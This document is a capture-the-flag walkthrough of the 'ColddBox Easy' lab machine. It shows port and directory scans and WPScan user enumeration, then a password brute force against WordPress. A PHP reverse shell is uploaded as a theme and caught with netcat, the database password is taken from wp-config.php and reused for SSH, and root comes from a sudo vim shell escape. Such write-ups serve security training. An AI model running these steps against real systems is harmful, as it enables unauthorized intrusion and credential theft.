c0lddBox
Port recognition withnmapor you can use recon
┌──(root@ghost)-[/home/ghost]
└─# recon c0ldd.vuln
.o oOOOOOOOo OOOo
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
OOOOO '"OOOOOOOOOOOOOOOO"` oOO
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
`$" `OOOO' `O"Y ' `OOOO' o .
. . OP" : o .
:
.
[R3C0N] by 0bfxgh0st 4 WWA with ❤
[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-01 11:50 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:50
Completed NSE at 11:50, 0.00s elapsed
Initiating ARP Ping Scan at 11:50
Scanning c0ldd.vuln (10.0.2.28) [1 port]
Completed ARP Ping Scan at 11:50, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 11:50
Scanning c0ldd.vuln (10.0.2.28) [65535 ports]
Discovered open port 80/tcp on 10.0.2.28
Discovered open port 4512/tcp on 10.0.2.28
Completed SYN Stealth Scan at 11:50, 1.48s elapsed (65535 total ports)
NSE: Script scanning 10.0.2.28.
Initiating NSE at 11:50
Completed NSE at 11:50, 0.00s elapsed
Nmap scan report for c0ldd.vuln (10.0.2.28)
Host is up (0.000054s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
4512/tcp open unknown
MAC Address: 08:00:27:70:43:DD (Oracle VirtualBox virtual NIC)
NSE: Script Post-scanning.
Initiating NSE at 11:50
Completed NSE at 11:50, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.79 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
[i] [Server info]
http://c0ldd.vuln:80 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.0.2.28], JQuery[1.11.1], MetaGenerator[WordPress 4.1.31], PoweredBy[WordPress,WordPress,], Script[text/javascript], Title[ColddBox | One more machine], WordPress[4.1.31], x-pingback[/xmlrpc.php]
[+] [fuzzin server]
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Oct 1 11:50:28 2022
URL_BASE: http://c0ldd.vuln:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://c0ldd.vuln:80/ ----
==> DIRECTORY: http://c0ldd.vuln:80/hidden/
+ http://c0ldd.vuln:80/index.php (CODE:301|SIZE:0)
+ http://c0ldd.vuln:80/server-status (CODE:403|SIZE:275)
==> DIRECTORY: http://c0ldd.vuln:80/wp-admin/
==> DIRECTORY: http://c0ldd.vuln:80/wp-content/
==> DIRECTORY: http://c0ldd.vuln:80/wp-includes/
+ http://c0ldd.vuln:80/xmlrpc.php (CODE:200|SIZE:42)
-----------------
END_TIME: Sat Oct 1 11:50:29 2022
DOWNLOADED: 4612 - FOUND: 3
recon reports two open ports 80 for http and 4512 is unknown, seems to be a wordpress site as whatweb says
┌──(root@ghost)-[/home/ghost]
└─# nmap c0ldd.vuln -v -sV -p 4512 --min-rate 5000
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-01 11:54 EDT
NSE: Loaded 45 scripts for scanning.
Initiating ARP Ping Scan at 11:54
Scanning c0ldd.vuln (10.0.2.28) [1 port]
Completed ARP Ping Scan at 11:54, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 11:54
Scanning c0ldd.vuln (10.0.2.28) [1 port]
Discovered open port 4512/tcp on 10.0.2.28
Completed SYN Stealth Scan at 11:54, 0.02s elapsed (1 total ports)
Initiating Service scan at 11:54
Scanning 1 service on c0ldd.vuln (10.0.2.28)
Completed Service scan at 11:54, 0.01s elapsed (1 service on 1 host)
NSE: Script scanning 10.0.2.28.
Initiating NSE at 11:54
Completed NSE at 11:54, 0.00s elapsed
Initiating NSE at 11:54
Completed NSE at 11:54, 0.00s elapsed
Nmap scan report for c0ldd.vuln (10.0.2.28)
Host is up (0.00040s latency).
PORT STATE SERVICE VERSION
4512/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
MAC Address: 08:00:27:70:43:DD (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds
Raw packets sent: 2 (72B) | Rcvd: 2 (72B)
Okay so port 4512 seems to be a ssh service at first instance
┌──(root@ghost)-[/home/ghost]
└─# wpscan -e u,p --url http://c0ldd.vuln/
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://c0ldd.vuln/ [10.0.2.28]
[+] Started: Sat Oct 1 11:56:54 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://c0ldd.vuln/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://c0ldd.vuln/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://c0ldd.vuln/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.1.31 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://c0ldd.vuln/?feed=rss2, https://wordpress.org/?v=4.1.31
| - http://c0ldd.vuln/?feed=comments-rss2, https://wordpress.org/?v=4.1.31
[+] WordPress theme in use: twentyfifteen
| Location: http://c0ldd.vuln/wp-content/themes/twentyfifteen/
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: http://c0ldd.vuln/wp-content/themes/twentyfifteen/readme.txt
| [!] The version is out of date, the latest version is 3.2
| Style URL: http://c0ldd.vuln/wp-content/themes/twentyfifteen/style.css?ver=4.1.31
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Style (Passive Detection)
| - http://c0ldd.vuln/wp-content/themes/twentyfifteen/style.css?ver=4.1.31, Match: 'Version: 1.0'
[+] Enumerating Most Popular Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <======================================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] User(s) Identified:
[+] the cold in person
| Found By: Rss Generator (Passive Detection)
[+] hugo
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] c0ldd
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[+] philip
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Oct 1 11:56:58 2022
[+] Requests Done: 75
[+] Cached Requests: 6
[+] Data Sent: 16.948 KB
[+] Data Received: 19.156 MB
[+] Memory used: 231.461 MB
[+] Elapsed time: 00:00:04
We obtain a few wordpress users
┌──(root@ghost)-[/home/ghost]
└─# wpscan -U c0ldd -P rockyou.txt --url http://c0ldd.vuln/
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://c0ldd.vuln/ [10.0.2.28]
[+] Started: Sat Oct 1 11:58:58 2022
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://c0ldd.vuln/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://c0ldd.vuln/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://c0ldd.vuln/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.1.31 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://c0ldd.vuln/?feed=rss2, https://wordpress.org/?v=4.1.31
| - http://c0ldd.vuln/?feed=comments-rss2, https://wordpress.org/?v=4.1.31
[+] WordPress theme in use: twentyfifteen
| Location: http://c0ldd.vuln/wp-content/themes/twentyfifteen/
| Last Updated: 2022-05-24T00:00:00.000Z
| Readme: http://c0ldd.vuln/wp-content/themes/twentyfifteen/readme.txt
| [!] The version is out of date, the latest version is 3.2
| Style URL: http://c0ldd.vuln/wp-content/themes/twentyfifteen/style.css?ver=4.1.31
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Style (Passive Detection)
| - http://c0ldd.vuln/wp-content/themes/twentyfifteen/style.css?ver=4.1.31, Match: 'Version: 1.0'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <=====================================================================================================================> (137 / 137) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Performing password attack on Wp Login against 1 user/s
[SUCCESS] - c0ldd / 9876543210
Trying c0ldd / 9876543210 Time: 00:00:10 < > (1225 / 14345617) 0.00% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: c0ldd, Password: 9876543210
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sat Oct 1 11:59:14 2022
[+] Requests Done: 1366
[+] Cached Requests: 36
[+] Data Sent: 436.496 KB
[+] Data Received: 4.514 MB
[+] Memory used: 252.156 MB
[+] Elapsed time: 00:00:15
We have c0ldd wordpress password, time to login. I decided to upload a php shell as a new theme
┌──(root@ghost)-[/home/ghost]
└─# shellstorm.sh php-daemon 10.0.2.15 1337 > rev.php
Once netcat is listening curl where our shell was uploaded in http://c0ldd.vuln/wp-content/uploads/2022/10/rev.php
┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337
listening on [any] 1337 ...
connect to [10.0.2.15] from c0ldd.vuln [10.0.2.28] 46772
Linux ColddBox-Easy 4.4.0-186-generic #216-Ubuntu SMP Wed Jul 1 05:34:05 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
18:11:33 up 31 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")';
www-data@ColddBox-Easy:/$ export TERM=xterm;export SHELL=bash
www-data@ColddBox-Easy:/$ ss -tnl
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 128 *:4512 *:*
LISTEN 0 128 127.0.0.1:3306 *:*
LISTEN 0 128 :::4512 :::*
LISTEN 0 128 :::80 :::*
www-data@ColddBox-Easy:/$ service mysql status
* mysql.service - LSB: Start and stop the mysql database server daemon
Loaded: loaded (/etc/init.d/mysql; bad; vendor preset: enabled)
Active: active (running) since Sat 2022-10-01 17:39:46 CEST; 38min ago
Docs: man:systemd-sysv-generator(8)
Process: 1094 ExecStart=/etc/init.d/mysql start (code=exited, status=0/SUCCESS
Tasks: 30
Memory: 88.7M
CPU: 2.029s
CGroup: /system.slice/mysql.service
|-1245 /bin/bash /usr/bin/mysqld_safe
|-1398 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plu
`-1399 logger -t mysqld -p daemon error
We have a local mysql service
www-data@ColddBox-Easy:/$
cd /var/www/html
www-data@ColddBox-Easy:/var/www/html$ cat wp-config.php
<?php
/**
* The base configurations of the WordPress.
*
* This file has the following configurations: MySQL settings, Table Prefix,
* Secret Keys, and ABSPATH. You can find more information by visiting
* {@link http://codex.wordpress.org/Editing_wp-config.php Editing wp-config.php}
* Codex page. You can get the MySQL settings from your web host.
*
* This file is used by the wp-config.php creation script during the
* installation. You don't have to use the web site, you can just copy this file
* to "wp-config.php" and fill in the values.
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'colddbox');
/** MySQL database username */
define('DB_USER', 'c0ldd');
/** MySQL database password */
define('DB_PASSWORD', 'cybersecurity');
/** MySQL hostname */
define('DB_HOST', 'localhost');
...
It seems we have the mysql credentials, at this point you can try log and crack philip password but possible is a rabbit hole. So let's try that credentials in port 4512
┌──(root@ghost)-[/home/ghost]
└─# ssh c0ldd@c0ldd.vuln -p 4512
The authenticity of host '[c0ldd.vuln]:4512 ([10.0.2.28]:4512)' can't be established.
ED25519 key fingerprint is SHA256:4Burx9DOSmBG9A0+DFqpM7rY4cyqpq59iluJwKx690c.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[c0ldd.vuln]:4512' (ED25519) to the list of known hosts.
c0ldd@c0ldd.vuln's password:
Welcome to Ubuntu 16.04.7 LTS (GNU/Linux 4.4.0-186-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Pueden actualizarse 128 paquetes.
92 actualizaciones son de seguridad.
Last login: Mon Oct 19 18:48:20 2020 from 10.0.1.4
c0ldd@ColddBox-Easy:~$ cat user.txt | base64 -d
Felicidades, primer nivel conseguido!
We have user flag. Time to get root
c0ldd@ColddBox-Easy:~$ sudo -l
[sudo] password for c0ldd:
Coincidiendo entradas por defecto para c0ldd en ColddBox-Easy:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
El usuario c0ldd puede ejecutar los siguientes comandos en ColddBox-Easy:
(root) /usr/bin/vim
(root) /bin/chmod
(root) /usr/bin/ftp
c0ldd@ColddBox-Easy:~$ sudo vim -c ':!/bin/sh'
# cat /root/root.txt | base64 -d
¡Felicidades, máquina completada!